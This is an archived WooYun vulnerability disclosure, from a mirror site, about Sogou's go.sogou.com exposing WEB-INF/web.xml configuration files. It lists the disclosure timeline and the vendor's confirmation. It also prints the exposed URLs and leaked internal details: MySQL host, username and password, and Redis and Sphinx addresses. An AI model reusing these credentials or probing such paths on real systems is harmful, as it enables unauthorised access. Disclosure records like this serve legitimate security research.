乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-28: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
...
据说修复了。。but
http://go.sogou.com/hotel/WEB-INF/web.xmlhttp://go.sogou.com/zt/WEB-INF/web.xmlhttp://go.sogou.com/tejia/WEB-INF/web.xmlhttp://go.sogou.com/plane/WEB-INF/web.xml
<project session="disable"><system><class>class</class><temp>temp</temp><log>log</log><template>template</template><cache>cache</cache></system><databases><database type="MySQL" host="10.136.40.76" port="3306" username="web" password="develop" socket="" database="hotel" emulatePrepare="1"/><location path="/usr/local/mysql"/></databases><phpbin>/usr/local/bin/php</phpbin><pages cache="false"/><permission complexVerify="false"/><params><param name="job_queue_key" value="job_queue_key"/><param name="job_publish_channel" value="job_publish_channel"/><param name="redis_cache" value="10.136.16.146:6666"/><param name="redis_ticket" value="10.136.16.146:7777"/><param name="sphinx_server" value="10.136.16.147:9876"/><param name="sphinx_smart_server" value="10.136.16.147:9871"/><param name="smart_city_server" value="10.136.16.147:36002;10.136.16.147:36002"/><param name="smart_kword_server" value="10.136.16.147:36003"/><param name="js_version" value="1"/><param name="use_packjs" value="on"/><param name="use_preRedis" value=""/><param name="sh_name" value="sendCommandSphinx.sh"/><param name="php" value="/usr/local/bin/php"/></params></project><databases><database type="MySQL" host="10.136.40.76" port="3306" username="web" password="develop" socket="" database="zhuanti" emulatePrepare="1"/><location path="/usr/local/mysql"/></databases><phpbin>/usr/local/bin/php</phpbin><pages cache="false"/><permission complexVerify="false"/><params><param name="isRedis" value="1"/><param name="redis_cache" value="10.136.16.146:6767"/></params></project><databases><database type="MySQL" host="10.136.40.76" port="3306" username="web" password="develop" socket="" database="tejia" emulatePrepare="0"/><location path="/usr/local/mysql"/></databases><phpbin>/usr/local/bin/php</phpbin><pages cache="false"/><permission complexVerify="false"/><params><param name="redis_cache" value="10.136.16.146:6666"/><param name="isRedis" value="1"/><param name="sphinx_server" value="10.136.16.147:9874"/><param name="sphinx_data" value="10.136.16.147:9883"/><param name="use_packjs" value="on"/><param name="sphinx_ip" value="10.136.16.147"/><param name="sh_data" value="csft_tejia_data.conf"/><param name="sh_smart" value="csft_smart_tejia_kw.conf"/></params></project>
ok
···
改
危害等级:高
漏洞Rank:12
确认时间:2015-12-31 11:26
感谢支持
暂无